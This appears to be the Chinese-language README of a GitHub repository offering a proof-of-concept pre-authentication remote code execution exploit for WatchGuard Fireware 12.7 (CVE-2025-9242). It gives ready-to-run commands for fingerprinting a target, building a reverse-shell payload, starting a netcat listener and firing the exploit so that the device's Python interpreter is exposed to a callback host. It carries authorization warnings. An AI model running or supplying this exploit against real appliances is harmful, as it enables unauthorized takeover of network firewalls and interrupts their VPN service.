UnusualGiraffe/PoC-Unauthenticated-RCE-in-WatchGuard-Fireware-12.7-Build-640389-CVE-2025-9242

GitHub: UnusualGiraffe/PoC-Unauthenticated-RCE-in-WatchGuard-Fireware-12.7-Build-640389-CVE-2025-9242

针对 WatchGuard Fireware 12.7 CVE-2025-9242 预认证 RCE 漏洞的版本固定 PoC 存档,包含安全检测、离线 payload 分析和受控的 exploit 执行三种模式。

Stars: 0 | Forks: 0

# CVE-2025-9242 PoC 本包为以下内容保留了固定版本的 WatchGuard Fireware exploit profile: - Fireware `12.7` - build `640389` - M270 appliance profile - CVE-2025-9242 它包含一个活跃的预认证远程代码执行 (remote-code-execution) exploit。请仅在您拥有或获得明确授权测试的系统上使用它。成功的 exploit 即使在 callback 未到达时,也会中断 IKE 服务。 ## 环境要求 - x86-64 架构的 Linux - Python 3.11 或更高版本 - 适用于 amd64 的 GNU binutils(pwntools 使用它来汇编 runtime callback) 在隔离的环境中安装 Python 依赖项: ``` python3 -m venv .venv . .venv/bin/activate python3 -m pip install -r requirements.txt ``` ## 模式 ### `detect` 执行一次不溢出的 IKEv2 `IKE_SA_INIT` 交换,读取 vendor 的 version/build 指纹,并报告其是否与存档的 profile 完全匹配。它不会发送 513 字节的漏洞触发器。 ``` python3 wg_cve_2025_9242.py detect \ --rhost 192.0.2.10 \ --rport 500 ``` 使用 `--json` 获取机器可读的输出。 ### `analyze` 完全离线运行。它使用文档化的 callback 地址构建一个 reverse-shell payload,检查确切的 profile 常量和 payload 布局,并打印 shellcode/payload 的大小及 SHA-256 哈希值。 ``` python3 wg_cve_2025_9242.py analyze ``` 要在不发送的情况下检查具有不同 callback 的 payload 结构: ``` python3 wg_cve_2025_9242.py analyze \ --callback-ip 192.0.2.20 \ --callback-port 4444 ``` ### `exploit` 以相同的非溢出确切版本/构建检测开始。除非实时指纹为 `12.7` / `640389`、同时提供了明确的安全开关,并且 callback 是一个 IPv4 地址,否则它将拒绝继续。 首先启动一个 listener: ``` nc -lvnp 4444 ``` 然后,针对授权目标运行: ``` python3 wg_cve_2025_9242.py exploit \ --rhost 192.0.2.10 \ --rport 500 \ --callback-ip 192.0.2.20 \ --callback-port 4444 \ --confirm-profile 12.7-640389 \ --acknowledge-service-interruption ``` callback 以通用的 `uid` / `euid` 标志开始,然后暴露设备的 `/usr/bin/python` 交互式解释器。exploit 发送和 callback 成功是相互独立的事实:发送后的超时属于预期情况,并不能证明 reverse shell 已成功连接。 ## 离线验证 ``` python3 wg_cve_2025_9242.py analyze sha256sum -c MANIFEST.sha256 ``` 该包仅包含 CLI、protocol engine、依赖项列表、本 README、上游通知以及 `MANIFEST.sha256`。清单涵盖了其他五个文件。 ## 存档边界 本包特意排除了以下内容: - 真实的目标地址、主机名和业务名称; - 测试人员身份、工作站路径、callback 服务和 endpoint; - 凭据、cookie、token、会话材料、抓包记录和日志; - 生成的 shellcode/payload 二进制大文件; - 实操记录、发现、客户报告和内部拓扑; - 字节码缓存、VCS 元数据、时间戳和宿主所有权元数据。 Callback 材料仅在运行时由命令行参数生成。
标签:CISA项目, CVE-2025-9242, Python, WatchGuard, Web报告查看器, 云资产清单, 无后门, 逆向工程